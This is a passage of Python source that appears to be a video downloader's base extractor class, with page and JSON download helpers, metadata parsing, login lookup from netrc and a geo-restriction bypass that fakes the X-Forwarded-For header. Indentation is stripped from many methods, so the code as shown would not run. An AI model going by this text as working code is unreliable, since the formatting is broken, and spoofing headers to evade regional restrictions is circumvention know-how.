episode: Title of the video episode. Unlike mandatory video title field,
this field should denote the exact title of the video episode
without any kind of decoration.
episode_number: Number of the video episode within a season, as an integer.
episode_id: Id of the video episode, as a unicode string.
The following fields should only be used when the media is a track or a part of
a music album:
track: Title of the track.
track_number: Number of the track within an album or a disc, as an integer.
track_id: Id of the track (useful in case of custom indexing, e.g. 6.iii),
as a unicode string.
artist: Artist(s) of the track.
genre: Genre(s) of the track.
album: Title of the album the track belongs to.
album_type: Type of the album (e.g. "Demo", "Full-length", "Split", "Compilation", etc).
album_artist: List of all artists appeared on the album (e.g.
"Ash Borer / Fell Voices" or "Various Artists", useful for splits
and compilations).
disc_number: Number of the disc or other physical medium the track belongs to,
as an integer.
release_year: Year (YYYY) when the album was released.
Unless mentioned otherwise, the fields should be Unicode strings.
Unless mentioned otherwise, None is equivalent to absence of information.
_type "playlist" indicates multiple videos.
There must be a key "entries", which is a list, an iterable, or a PagedList
object, each element of which is a valid dictionary by this specification.
Additionally, playlists can have "id", "title", "description", "uploader",
"uploader_id", "uploader_url" attributes with the same semantics as videos
(see above).
_type "multi_video" indicates that there are multiple videos that
    form a single show, for example, multiple acts of an opera or TV episode.
It must have an entries key like a playlist and contain all the keys
required for a video at the same time.
_type "url" indicates that the video must be extracted from another
location, possibly by a different extractor. Its only required key is:
"url" - the next URL to extract.
The key "ie_key" can be set to the class name (minus the trailing "IE",
e.g. "Youtube") if the extractor class is known in advance.
Additionally, the dictionary may have any properties of the resolved entity
known in advance, for example "title" if the title of the referred video is
known ahead of time.
_type "url_transparent" entities have the same specification as "url", but
indicate that the given additional information is more precise than the one
associated with the resolved URL.
This is useful when a site employs a video service that hosts the video and
its technical metadata, but that video service does not embed a useful
title, description etc.
Subclasses of this one should re-define the _real_initialize() and
_real_extract() methods and define a _VALID_URL regexp.
Probably, they should also be added to the list of extractors.
_GEO_BYPASS attribute may be set to False in order to disable
geo restriction bypass mechanisms for a particular extractor.
Though it won't disable explicit geo restriction bypass based on
country code provided with geo_bypass_country.
_GEO_COUNTRIES attribute may contain a list of presumably geo unrestricted
countries for this extractor. One of these countries will be used by
geo restriction bypass mechanism right away in order to bypass
geo restriction, of course, if the mechanism is not disabled.
_GEO_IP_BLOCKS attribute may contain a list of presumably geo unrestricted
IP blocks in CIDR notation for this extractor. One of these IP blocks
will be used by geo restriction bypass mechanism similarly
to _GEO_COUNTRIES.
Finally, the _WORKING attribute should be set to False for broken IEs
in order to warn the users and skip the tests.
"""
_ready = False
_downloader = None
_x_forwarded_for_ip = None
_GEO_BYPASS = True
_GEO_COUNTRIES = None
_GEO_IP_BLOCKS = None
_WORKING = True
    def __init__(self, downloader=None):
        """Constructor. Receives an optional downloader."""
        # Instance attributes shadow the class-level defaults of the same name.
        self._ready = False
        self._x_forwarded_for_ip = None
        self.set_downloader(downloader)
@classmethod
def suitable(cls, url):
"""Receives a URL and returns True if suitable for this IE."""
# This does not use has/getattr intentionally - we want to know whether
# we have cached the regexp for *this* class, whereas getattr would also
# match the superclass
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
return cls._VALID_URL_RE.match(url) is not None
@classmethod
def _match_id(cls, url):
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
m = cls._VALID_URL_RE.match(url)
assert m
return compat_str(m.group('id'))
    @classmethod
    def working(cls):
        """Getter method for _WORKING (False marks the extractor broken)."""
        return cls._WORKING
    def initialize(self):
        """Initializes an instance (authentication, etc)."""
        # Geo bypass setup runs unconditionally (before the _ready check);
        # it is itself a no-op once a fake IP has been established.
        self._initialize_geo_bypass({
            'countries': self._GEO_COUNTRIES,
            'ip_blocks': self._GEO_IP_BLOCKS,
        })
        # _real_initialize() (subclass hook) runs at most once per instance.
        if not self._ready:
            self._real_initialize()
            self._ready = True
    def _initialize_geo_bypass(self, geo_bypass_context):
        """
        Initialize geo restriction bypass mechanism.

        This method is used to initialize geo bypass mechanism based on faking
        X-Forwarded-For HTTP header. A random country from provided country list
        is selected and a random IP belonging to this country is generated. This
        IP will be passed as X-Forwarded-For HTTP header in all subsequent
        HTTP requests.

        This method will be used for initial geo bypass mechanism initialization
        during the instance initialization with _GEO_COUNTRIES and
        _GEO_IP_BLOCKS.

        You may also manually call it from extractor's code if geo bypass
        information is not available beforehand (e.g. obtained during
        extraction) or due to some other reason. In this case you should pass
        this information in geo bypass context passed as first argument. It may
        contain following fields:

        countries:  List of geo unrestricted countries (similar
                    to _GEO_COUNTRIES)
        ip_blocks:  List of geo unrestricted IP blocks in CIDR notation
                    (similar to _GEO_IP_BLOCKS)
        """
        # Effectively runs once per instance: a previously faked IP is kept.
        if not self._x_forwarded_for_ip:
            # Geo bypass mechanism is explicitly disabled by user
            if not self._downloader.params.get('geo_bypass', True):
                return
            if not geo_bypass_context:
                geo_bypass_context = {}
            # Backward compatibility: previously _initialize_geo_bypass
            # expected a list of countries, some 3rd party code may still use
            # it this way
            if isinstance(geo_bypass_context, (list, tuple)):
                geo_bypass_context = {
                    'countries': geo_bypass_context,
                }
            # The whole point of geo bypass mechanism is to fake IP
            # as X-Forwarded-For HTTP header based on some IP block or
            # country code.
            # Path 1: bypassing based on IP block in CIDR notation
            # Explicit IP block specified by user, use it right away
            # regardless of whether extractor is geo bypassable or not
            ip_block = self._downloader.params.get('geo_bypass_ip_block', None)
            # Otherwise use random IP block from geo bypass context but only
            # if extractor is known as geo bypassable
            if not ip_block:
                ip_blocks = geo_bypass_context.get('ip_blocks')
                if self._GEO_BYPASS and ip_blocks:
                    ip_block = random.choice(ip_blocks)
            if ip_block:
                self._x_forwarded_for_ip = GeoUtils.random_ipv4(ip_block)
                if self._downloader.params.get('verbose', False):
                    self._downloader.to_screen(
                        '[debug] Using fake IP %s as X-Forwarded-For.'
                        % self._x_forwarded_for_ip)
                return
            # Path 2: bypassing based on country code
            # Explicit country code specified by user, use it right away
            # regardless of whether extractor is geo bypassable or not
            country = self._downloader.params.get('geo_bypass_country', None)
            # Otherwise use random country code from geo bypass context but
            # only if extractor is known as geo bypassable
            if not country:
                countries = geo_bypass_context.get('countries')
                if self._GEO_BYPASS and countries:
                    country = random.choice(countries)
            if country:
                self._x_forwarded_for_ip = GeoUtils.random_ipv4(country)
                if self._downloader.params.get('verbose', False):
                    self._downloader.to_screen(
                        '[debug] Using fake IP %s (%s) as X-Forwarded-For.'
                        % (self._x_forwarded_for_ip, country.upper()))
    def extract(self, url):
        """Extracts URL information and returns it in list of dicts."""
        try:
            # At most one retry: a second attempt is made only after a
            # GeoRestrictedError when a fake X-Forwarded-For IP was set up.
            for _ in range(2):
                try:
                    self.initialize()
                    ie_result = self._real_extract(url)
                    # Record the fake IP so the downloader can reuse it.
                    if self._x_forwarded_for_ip:
                        ie_result['__x_forwarded_for_ip'] = self._x_forwarded_for_ip
                    return ie_result
                except GeoRestrictedError as e:
                    if self.__maybe_fake_ip_and_retry(e.countries):
                        continue
                    raise
        except ExtractorError:
            # Already a user-facing extraction error; re-raise unchanged.
            raise
        except compat_http_client.IncompleteRead as e:
            raise ExtractorError('A network error has occurred.', cause=e, expected=True)
        except (KeyError, StopIteration) as e:
            raise ExtractorError('An extractor error has occurred.', cause=e)
def __maybe_fake_ip_and_retry(self, countries):
if (not self._downloader.params.get('geo_bypass_country', None) and
self._GEO_BYPASS and
self._downloader.params.get('geo_bypass', True) and
not self._x_forwarded_for_ip and
countries):
country_code = random.choice(countries)
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country_code)
if self._x_forwarded_for_ip:
self.report_warning(
'Video is geo restricted. Retrying extraction with fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country_code.upper()))
return True
return False
    def set_downloader(self, downloader):
        """Sets the downloader for this IE."""
        # Used throughout for option access (self._downloader.params) and
        # network requests (self._downloader.urlopen).
        self._downloader = downloader
    def _real_initialize(self):
        """Real initialization process. Redefine in subclasses."""
        # Intentionally a no-op here; called once from initialize().
        pass
    def _real_extract(self, url):
        """Real extraction process. Redefine in subclasses."""
        # Intentionally a no-op here; called from extract().
        pass
    @classmethod
    def ie_key(cls):
        """A string for getting the InfoExtractor with get_info_extractor"""
        # Class name minus the trailing "IE" (e.g. "FooIE" -> "Foo").
        return compat_str(cls.__name__[:-2])
    @property
    def IE_NAME(self):
        # Same convention as ie_key(): class name minus the trailing "IE".
        return compat_str(type(self).__name__[:-2])
@staticmethod
def __can_accept_status_code(err, expected_status):
assert isinstance(err, compat_urllib_error.HTTPError)
if expected_status is None:
return False
if isinstance(expected_status, compat_integer_types):
return err.code == expected_status
elif isinstance(expected_status, (list, tuple)):
return err.code in expected_status
elif callable(expected_status):
return expected_status(err.code) is True
else:
assert False
def _request_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, data=None, headers={}, query={}, expected_status=None):
"""
Return the response handle.
See _download_webpage docstring for arguments specification.
"""
if note is None:
self.report_download_webpage(video_id)
elif note is not False:
if video_id is None:
self.to_screen('%s' % (note,))
else:
self.to_screen('%s: %s' % (video_id, note))
# Some sites check X-Forwarded-For HTTP header in order to figure out
# the origin of the client behind proxy. This allows bypassing geo
# restriction by faking this header's value to IP that belongs to some
# geo unrestricted country. We will do so once we encounter any
# geo restriction error.
if self._x_forwarded_for_ip:
if 'X-Forwarded-For' not in headers:
headers['X-Forwarded-For'] = self._x_forwarded_for_ip
if isinstance(url_or_request, compat_urllib_request.Request):
url_or_request = update_Request(
url_or_request, data=data, headers=headers, query=query)
else:
if query:
url_or_request = update_url_query(url_or_request, query)
if data is not None or headers:
url_or_request = sanitized_Request(url_or_request, data, headers)
try:
return self._downloader.urlopen(url_or_request)
except (compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error) as err:
if isinstance(err, compat_urllib_error.HTTPError):
if self.__can_accept_status_code(err, expected_status):
return err.fp
if errnote is False:
return False
if errnote is None:
errnote = 'Unable to download webpage'
errmsg = '%s: %s' % (errnote, error_to_compat_str(err))
if fatal:
raise ExtractorError(errmsg, sys.exc_info()[2], cause=err)
else:
self._downloader.report_warning(errmsg)
return False
def _download_webpage_handle(self, url_or_request, video_id, note=None, errnote=None, fatal=True, encoding=None, data=None, headers={}, query={}, expected_status=None):
"""
Return a tuple (page content as string, URL handle).
See _download_webpage docstring for arguments specification.
"""
# Strip hashes from the URL (#1038)
if isinstance(url_or_request, (compat_str, str)):
url_or_request = url_or_request.partition('#')[0]
urlh = self._request_webpage(url_or_request, video_id, note, errnote, fatal, data=data, headers=headers, query=query, expected_status=expected_status)
if urlh is False:
assert not fatal
return False
content = self._webpage_read_content(urlh, url_or_request, video_id, note, errnote, fatal, encoding=encoding)
return (content, urlh)
@staticmethod
def _guess_encoding_from_content(content_type, webpage_bytes):
m = re.match(r'[a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+\s*;\s*charset=(.+)', content_type)
if m:
encoding = m.group(1)
else:
m = re.search(br'<meta[^>]+charset=[\'"]?([^\'")]+)[ /\'">]',
webpage_bytes[:1024])
if m:
encoding = m.group(1).decode('ascii')
elif webpage_bytes.startswith(b'\xff\xfe'):
encoding = 'utf-16'
else:
encoding = 'utf-8'
return encoding
    def __check_blocked(self, content):
        """Raise ExtractorError if *content* looks like a known blocking
        interstitial page (Websense filtering, Indian censorship, Russian
        government blocklist)."""
        first_block = content[:512]
        if ('<title>Access to this site is blocked</title>' in content and
                'Websense' in first_block):
            msg = 'Access to this webpage has been blocked by Websense filtering software in your network.'
            blocked_iframe = self._html_search_regex(
                r'<iframe src="([^"]+)"', content,
                'Websense information URL', default=None)
            if blocked_iframe:
                msg += ' Visit %s for more details' % blocked_iframe
            raise ExtractorError(msg, expected=True)
        if '<title>The URL you requested has been blocked</title>' in first_block:
            msg = (
                'Access to this webpage has been blocked by Indian censorship. '
                'Use a VPN or proxy server (with --proxy) to route around it.')
            block_msg = self._html_search_regex(
                r'</h1><p>(.*?)</p>',
                content, 'block message', default=None)
            if block_msg:
                msg += ' (Message: "%s")' % block_msg.replace('\n', ' ')
            raise ExtractorError(msg, expected=True)
        if ('<title>TTK :: Доступ к ресурсу ограничен</title>' in content and
                'blocklist.rkn.gov.ru' in content):
            raise ExtractorError(
                'Access to this webpage has been blocked by decision of the Russian government. '
                'Visit http://blocklist.rkn.gov.ru/ for a block reason.',
                expected=True)
    def _webpage_read_content(self, urlh, url_or_request, video_id, note=None, errnote=None, fatal=True, prefix=None, encoding=None):
        """Read the response handle *urlh* and decode it to text.

        Honours the 'dump_intermediate_pages' and 'write_pages' downloader
        params, guesses the encoding from the Content-Type header / content
        when *encoding* is not given, and raises on known blocking pages.
        """
        content_type = urlh.headers.get('Content-Type', '')
        webpage_bytes = urlh.read()
        if prefix is not None:
            webpage_bytes = prefix + webpage_bytes
        if not encoding:
            encoding = self._guess_encoding_from_content(content_type, webpage_bytes)
        if self._downloader.params.get('dump_intermediate_pages', False):
            self.to_screen('Dumping request to ' + urlh.geturl())
            dump = base64.b64encode(webpage_bytes).decode('ascii')
            self._downloader.to_screen(dump)
        if self._downloader.params.get('write_pages', False):
            basen = '%s_%s' % (video_id, urlh.geturl())
            if len(basen) > 240:
                # Keep the dump filename within length limits by replacing
                # the tail with a hash of the full name.
                h = '___' + hashlib.md5(basen.encode('utf-8')).hexdigest()
                basen = basen[:240 - len(h)] + h
            raw_filename = basen + '.dump'
            filename = sanitize_filename(raw_filename, restricted=True)
            self.to_screen('Saving request to ' + filename)
            # Working around MAX_PATH limitation on Windows (see
            # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
            if compat_os_name == 'nt':
                absfilepath = os.path.abspath(filename)
                if len(absfilepath) > 259:
                    filename = '\\\\?\\' + absfilepath
            with open(filename, 'wb') as outf:
                outf.write(webpage_bytes)
        try:
            content = webpage_bytes.decode(encoding, 'replace')
        except LookupError:
            # Unknown/invalid encoding name: fall back to UTF-8.
            content = webpage_bytes.decode('utf-8', 'replace')
        self.__check_blocked(content)
        return content
    def _download_webpage(
            self, url_or_request, video_id, note=None, errnote=None,
            fatal=True, tries=1, timeout=5, encoding=None, data=None,
            headers={}, query={}, expected_status=None):
        """
        Return the data of the page as a string.

        Arguments:
        url_or_request -- plain text URL as a string or
            a compat_urllib_request.Requestobject
        video_id -- Video/playlist/item identifier (string)

        Keyword arguments:
        note -- note printed before downloading (string)
        errnote -- note printed in case of an error (string)
        fatal -- flag denoting whether error should be considered fatal,
            i.e. whether it should cause ExtractionError to be raised,
            otherwise a warning will be reported and extraction continued
        tries -- number of tries
        timeout -- sleep interval between tries
        encoding -- encoding for a page content decoding, guessed automatically
            when not explicitly specified
        data -- POST data (bytes)
        headers -- HTTP headers (dict)
        query -- URL query (dict)
        expected_status -- allows to accept failed HTTP requests (non 2xx
            status code) by explicitly specifying a set of accepted status
            codes. Can be any of the following entities:
                - an integer type specifying an exact failed status code to
                  accept
                - a list or a tuple of integer types specifying a list of
                  failed status codes to accept
                - a callable accepting an actual failed status code and
                  returning True if it should be accepted
            Note that this argument does not affect success status codes (2xx)
            which are always accepted.
        """
        success = False
        try_count = 0
        # Retry only on truncated reads, up to `tries` attempts, sleeping
        # `timeout` seconds between attempts.
        while success is False:
            try:
                res = self._download_webpage_handle(
                    url_or_request, video_id, note, errnote, fatal,
                    encoding=encoding, data=data, headers=headers, query=query,
                    expected_status=expected_status)
                success = True
            except compat_http_client.IncompleteRead as e:
                try_count += 1
                if try_count >= tries:
                    raise e
                self._sleep(timeout, video_id)
        # res is False only when the download failed non-fatally.
        if res is False:
            return res
        else:
            content, _ = res
            return content
def _download_xml_handle(
self, url_or_request, video_id, note='Downloading XML',
errnote='Unable to download XML', transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={},
expected_status=None):
"""
Return a tuple (xml as an xml.etree.ElementTree.Element, URL handle).
See _download_webpage docstring for arguments specification.
"""
res = self._download_webpage_handle(
url_or_request, video_id, note, errnote, fatal=fatal,
encoding=encoding, data=data, headers=headers, query=query,
expected_status=expected_status)
if res is False:
return res
xml_string, urlh = res
return self._parse_xml(
xml_string, video_id, transform_source=transform_source,
fatal=fatal), urlh
def _download_xml(
self, url_or_request, video_id,
note='Downloading XML', errnote='Unable to download XML',
transform_source=None, fatal=True, encoding=None,
data=None, headers={}, query={}, expected_status=None):
"""
Return the xml as an xml.etree.ElementTree.Element.
See _download_webpage docstring for arguments specification.
"""
res = self._download_xml_handle(
url_or_request, video_id, note=note, errnote=errnote,
transform_source=transform_source, fatal=fatal, encoding=encoding,
data=data, headers=headers, query=query,
expected_status=expected_status)
return res if res is False else res[0]
def _parse_xml(self, xml_string, video_id, transform_source=None, fatal=True):
if transform_source:
xml_string = transform_source(xml_string)
try:
return compat_etree_fromstring(xml_string.encode('utf-8'))
except compat_xml_parse_error as ve:
errmsg = '%s: Failed to parse XML ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def _download_json_handle(
self, url_or_request, video_id, note='Downloading JSON metadata',
errnote='Unable to download JSON metadata', transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={},
expected_status=None):
"""
Return a tuple (JSON object, URL handle).
See _download_webpage docstring for arguments specification.
"""
res = self._download_webpage_handle(
url_or_request, video_id, note, errnote, fatal=fatal,
encoding=encoding, data=data, headers=headers, query=query,
expected_status=expected_status)
if res is False:
return res
json_string, urlh = res
return self._parse_json(
json_string, video_id, transform_source=transform_source,
fatal=fatal), urlh
def _download_json(
self, url_or_request, video_id, note='Downloading JSON metadata',
errnote='Unable to download JSON metadata', transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={},
expected_status=None):
"""
Return the JSON object as a dict.
See _download_webpage docstring for arguments specification.
"""
res = self._download_json_handle(
url_or_request, video_id, note=note, errnote=errnote,
transform_source=transform_source, fatal=fatal, encoding=encoding,
data=data, headers=headers, query=query,
expected_status=expected_status)
return res if res is False else res[0]
def _parse_json(self, json_string, video_id, transform_source=None, fatal=True):
if transform_source:
json_string = transform_source(json_string)
try:
return json.loads(json_string)
except ValueError as ve:
errmsg = '%s: Failed to parse JSON ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def report_warning(self, msg, video_id=None):
idstr = '' if video_id is None else '%s: ' % video_id
self._downloader.report_warning(
'[%s] %s%s' % (self.IE_NAME, idstr, msg))
def to_screen(self, msg):
"""Print msg to screen, prefixing it with '[ie_name]'"""
self._downloader.to_screen('[%s] %s' % (self.IE_NAME, msg))
def report_extraction(self, id_or_name):
"""Report information extraction."""
self.to_screen('%s: Extracting information' % id_or_name)
def report_download_webpage(self, video_id):
"""Report webpage download."""
self.to_screen('%s: Downloading webpage' % video_id)
def report_age_confirmation(self):
"""Report attempt to confirm age."""
self.to_screen('Confirming age')
def report_login(self):
"""Report attempt to log in."""
self.to_screen('Logging in')
@staticmethod
def raise_login_required(msg='This video is only available for registered users'):
raise ExtractorError(
'%s. Use --username and --password or --netrc to provide account credentials.' % msg,
expected=True)
@staticmethod
def raise_geo_restricted(msg='This video is not available from your location due to geo restriction', countries=None):
raise GeoRestrictedError(msg, countries=countries)
# Methods for following #608
@staticmethod
def url_result(url, ie=None, video_id=None, video_title=None):
"""Returns a URL that points to a page that should be processed"""
# TODO: ie should be the class used for getting the info
video_info = {'_type': 'url',
'url': url,
'ie_key': ie}
if video_id is not None:
video_info['id'] = video_id
if video_title is not None:
video_info['title'] = video_title
return video_info
def playlist_from_matches(self, matches, playlist_id=None, playlist_title=None, getter=None, ie=None):
urls = orderedSet(
self.url_result(self._proto_relative_url(getter(m) if getter else m), ie)
for m in matches)
return self.playlist_result(
urls, playlist_id=playlist_id, playlist_title=playlist_title)
@staticmethod
def playlist_result(entries, playlist_id=None, playlist_title=None, playlist_description=None):
"""Returns a playlist"""
video_info = {'_type': 'playlist',
'entries': entries}
if playlist_id:
video_info['id'] = playlist_id
if playlist_title:
video_info['title'] = playlist_title
if playlist_description:
video_info['description'] = playlist_description
return video_info
    def _search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
        """
        Perform a regex search on the given string, using a single or a list of
        patterns returning the first matching group.
        In case of failure return a default value or raise a WARNING or a
        RegexNotFoundError, depending on fatal, specifying the field name.
        """
        if isinstance(pattern, (str, compat_str, compiled_regex_type)):
            mobj = re.search(pattern, string, flags)
        else:
            # List of patterns: first pattern that matches wins.
            # NOTE(review): an empty pattern list would leave mobj unbound —
            # callers are assumed to always pass at least one pattern.
            for p in pattern:
                mobj = re.search(p, string, flags)
                if mobj:
                    break
        # Highlight the field name in blue when writing to a color-capable
        # terminal (not on Windows, not when --no-color is set).
        if not self._downloader.params.get('no_color') and compat_os_name != 'nt' and sys.stderr.isatty():
            _name = '\033[0;34m%s\033[0m' % name
        else:
            _name = name
        if mobj:
            if group is None:
                # return the first matching group
                return next(g for g in mobj.groups() if g is not None)
            else:
                return mobj.group(group)
        elif default is not NO_DEFAULT:
            return default
        elif fatal:
            raise RegexNotFoundError('Unable to extract %s' % _name)
        else:
            self._downloader.report_warning('unable to extract %s' % _name + bug_reports_message())
            return None
def _html_search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Like _search_regex, but strips HTML tags and unescapes entities.
"""
res = self._search_regex(pattern, string, name, default, fatal, flags, group)
if res:
return clean_html(res).strip()
else:
return res
def _get_netrc_login_info(self, netrc_machine=None):
username = None
password = None
netrc_machine = netrc_machine or self._NETRC_MACHINE
if self._downloader.params.get('usenetrc', False):
try:
info = netrc.netrc().authenticators(netrc_machine)
if info is not None:
username = info[0]
password = info[2]
else:
raise netrc.NetrcParseError(
'No authenticators for %s' % netrc_machine)
except (IOError, netrc.NetrcParseError) as err:
self._downloader.report_warning(
'parsing .netrc: %s' % error_to_compat_str(err))
return username, password
def _get_login_info(self, username_option='username', password_option='password', netrc_machine=None):
"""
Get the login info as (username, password)
First look for the manually specified credentials using username_option
and password_option as keys in params dictionary. If no such credentials
available look in the netrc file using the netrc_machine or _NETRC_MACHINE
value.
If there's no info available, return (None, None)
"""
if self._downloader is None:
return (None, None)
downloader_params = self._downloader.params
# Attempt to use provided username and password or .netrc data
if downloader_params.get(username_option) is not None:
username = downloader_params[username_option]
password = downloader_params[password_option]
else:
username, password = self._get_netrc_login_info(netrc_machine)
return username, password
def _get_tfa_info(self, note='two-factor verification code'):
"""
Get the two-factor authentication info
TODO - asking the user will be required for sms/phone verify
currently just uses the command line option
If there's no info available, return None
"""
if self._downloader is None:
return None
downloader_params = self._downloader.params
if downloader_params.get('twofactor') is not None:
return downloader_params['twofactor']
return compat_getpass('Type %s and press [Return]: ' % note)
# Helper functions for extracting OpenGraph info
@staticmethod
def _og_regexes(prop):
content_re = r'content=(?:"([^"]+?)"|\'([^\']+?)\'|\s*([^\s"\'=<>`]+?))'
property_re = (r'(?:name|property)=(?:\'og:%(prop)s\'|"og:%(prop)s"|\s*og:%(prop)s\b)'
% {'prop': re.escape(prop)})
template = r'<meta[^>]+?%s[^>]+?%s'
return [
template % (property_re, content_re),
template % (content_re, property_re),
]
    @staticmethod
    def _meta_regex(prop):
        # Verbose (?x) regex: a <meta> whose identifying attribute
        # (itemprop/name/property/id/http-equiv) equals `prop`, capturing the
        # value of its content attribute in the named group 'content'.
        return r'''(?isx)<meta
                    (?=[^>]+(?:itemprop|name|property|id|http-equiv)=(["\']?)%s\1)
                    [^>]+?content=(["\'])(?P<content>.*?)\2''' % re.escape(prop)
def _og_search_property(self, prop, html, name=None, **kargs):
if not isinstance(prop, (list, tuple)):
prop = [prop]
if name is None:
name = 'OpenGraph %s' % prop[0]
og_regexes = []
for p in prop:
og_regexes.extend(self._og_regexes(p))
escaped = self._search_regex(og_regexes, html, name, flags=re.DOTALL, **kargs)
if escaped is None:
return None
return unescapeHTML(escaped)
    def _og_search_thumbnail(self, html, **kargs):
        # Non-fatal: returns None when og:image is absent.
        return self._og_search_property('image', html, 'thumbnail URL', fatal=False, **kargs)
    def _og_search_description(self, html, **kargs):
        # Non-fatal: returns None when og:description is absent.
        return self._og_search_property('description', html, fatal=False, **kargs)
    def _og_search_title(self, html, **kargs):
        # Fatal by default (title is usually mandatory); pass fatal=False to relax.
        return self._og_search_property('title', html, **kargs)
def _og_search_video_url(self, html, name='video url', secure=True, **kargs):
regexes = self._og_regexes('video') + self._og_regexes('video:url')
if secure:
regexes = self._og_regexes('video:secure_url') + regexes
return self._html_search_regex(regexes, html, name, **kargs)
    def _og_search_url(self, html, **kargs):
        # Fatal by default; pass fatal=False to get None when og:url is absent.
        return self._og_search_property('url', html, **kargs)
def _html_search_meta(self, name, html, display_name=None, fatal=False, **kwargs):
if not isinstance(name, (list, tuple)):
name = [name]
if display_name is None:
display_name = name[0]
return self._html_search_regex(
[self._meta_regex(n) for n in name],
html, display_name, fatal=fatal, group='content', **kwargs)
    def _dc_search_uploader(self, html):
        # Dublin Core creator meta tag, reported as the uploader field.
        return self._html_search_meta('dc.creator', html, 'uploader')
def _rta_search(self, html):
# See http://www.rtalabel.org/index.php?content=howtofaq#single
if re.search(r'(?ix)<meta\s+name="rating"\s+'
r' content="RTA-5042-1996-1400-1577-RTA"',
html):
return 18
return 0
def _media_rating_search(self, html):
# See http://www.tjg-designs.com/WP/metadata-code-examples-adding-metadata-to-your-web-pages/
rating = self._html_search_meta('rating', html)
if not rating:
return None
RATING_TABLE = {
'safe for kids': 0,
'general': 8,
'14 years': 14,
'mature': 17,
'restricted': 19,
}
return RATING_TABLE.get(rating.lower())
def _family_friendly_search(self, html):
# See http://schema.org/VideoObject
family_friendly = self._html_search_meta(
'isFamilyFriendly', html, default=None)
if not family_friendly:
return None
RATING_TABLE = {
'1': 0,
'true': 0,
'0': 18,
'false': 18,
}
return RATING_TABLE.get(family_friendly.lower())
    def _twitter_search_player(self, html):
        # Twitter Card player URL (twitter:player meta tag).
        return self._html_search_meta('twitter:player', html,
                                      'twitter card player')
def _search_json_ld(self, html, video_id, expected_type=None, **kwargs):
json_ld = self._search_regex(
JSON_LD_RE, html, 'JSON-LD', group='json_ld', **kwargs)
default = kwargs.get('default', NO_DEFAULT)
if not json_ld:
return default if default is not NO_DEFAULT else {}
# JSON-LD may be malformed and thus `fatal` should be respected.
# At the same time `default` may be passed that assumes `fatal=False`
# for _search_regex. Let's simulate the same behavior here as well.
fatal = kwargs.get('fatal', True) if default == NO_DEFAULT else False
return self._json_ld(json_ld, video_id, fatal=fatal, expected_type=expected_type)
    def _json_ld(self, json_ld, video_id, fatal=True, expected_type=None):
        """Convert (already extracted) JSON-LD data into an info dict.

        json_ld may be a JSON string, a dict or a list of dicts; only items
        whose @context is schema.org are considered.  Keys with None values
        are dropped from the result.
        """
        if isinstance(json_ld, compat_str):
            json_ld = self._parse_json(json_ld, video_id, fatal=fatal)
        if not json_ld:
            return {}
        info = {}
        if not isinstance(json_ld, (list, tuple, dict)):
            return info
        if isinstance(json_ld, dict):
            json_ld = [json_ld]
        # Maps schema.org interactionType suffixes to info dict count fields.
        INTERACTION_TYPE_MAP = {
            'CommentAction': 'comment',
            'AgreeAction': 'like',
            'DisagreeAction': 'dislike',
            'LikeAction': 'like',
            'DislikeAction': 'dislike',
            'ListenAction': 'view',
            'WatchAction': 'view',
            'ViewAction': 'view',
        }
        def extract_interaction_statistic(e):
            # Fill <kind>_count fields from InteractionCounter entries;
            # the first valid counter of each kind wins.
            interaction_statistic = e.get('interactionStatistic')
            if not isinstance(interaction_statistic, list):
                return
            for is_e in interaction_statistic:
                if not isinstance(is_e, dict):
                    continue
                if is_e.get('@type') != 'InteractionCounter':
                    continue
                interaction_type = is_e.get('interactionType')
                if not isinstance(interaction_type, compat_str):
                    continue
                interaction_count = int_or_none(is_e.get('userInteractionCount'))
                if interaction_count is None:
                    continue
                # interactionType is a URL; only its last path component matters.
                count_kind = INTERACTION_TYPE_MAP.get(interaction_type.split('/')[-1])
                if not count_kind:
                    continue
                count_key = '%s_count' % count_kind
                if info.get(count_key) is not None:
                    continue
                info[count_key] = interaction_count
        def extract_video_object(e):
            # Mutates the enclosing `info` dict with VideoObject fields.
            assert e['@type'] == 'VideoObject'
            info.update({
                'url': e.get('contentUrl'),
                'title': unescapeHTML(e.get('name')),
                'description': unescapeHTML(e.get('description')),
                'thumbnail': e.get('thumbnailUrl') or e.get('thumbnailURL'),
                'duration': parse_duration(e.get('duration')),
                'timestamp': unified_timestamp(e.get('uploadDate')),
                'filesize': float_or_none(e.get('contentSize')),
                'tbr': int_or_none(e.get('bitrate')),
                'width': int_or_none(e.get('width')),
                'height': int_or_none(e.get('height')),
                'view_count': int_or_none(e.get('interactionCount')),
            })
            extract_interaction_statistic(e)
        for e in json_ld:
            if isinstance(e.get('@context'), compat_str) and re.match(r'^https?://schema.org/?$', e.get('@context')):
                item_type = e.get('@type')
                if expected_type is not None and expected_type != item_type:
                    return info
                if item_type in ('TVEpisode', 'Episode'):
                    info.update({
                        'episode': unescapeHTML(e.get('name')),
                        'episode_number': int_or_none(e.get('episodeNumber')),
                        'description': unescapeHTML(e.get('description')),
                    })
                    part_of_season = e.get('partOfSeason')
                    if isinstance(part_of_season, dict) and part_of_season.get('@type') in ('TVSeason', 'Season', 'CreativeWorkSeason'):
                        info['season_number'] = int_or_none(part_of_season.get('seasonNumber'))
                    part_of_series = e.get('partOfSeries') or e.get('partOfTVSeries')
                    if isinstance(part_of_series, dict) and part_of_series.get('@type') in ('TVSeries', 'Series', 'CreativeWorkSeries'):
                        info['series'] = unescapeHTML(part_of_series.get('name'))
                elif item_type in ('Article', 'NewsArticle'):
                    info.update({
                        'timestamp': parse_iso8601(e.get('datePublished')),
                        'title': unescapeHTML(e.get('headline')),
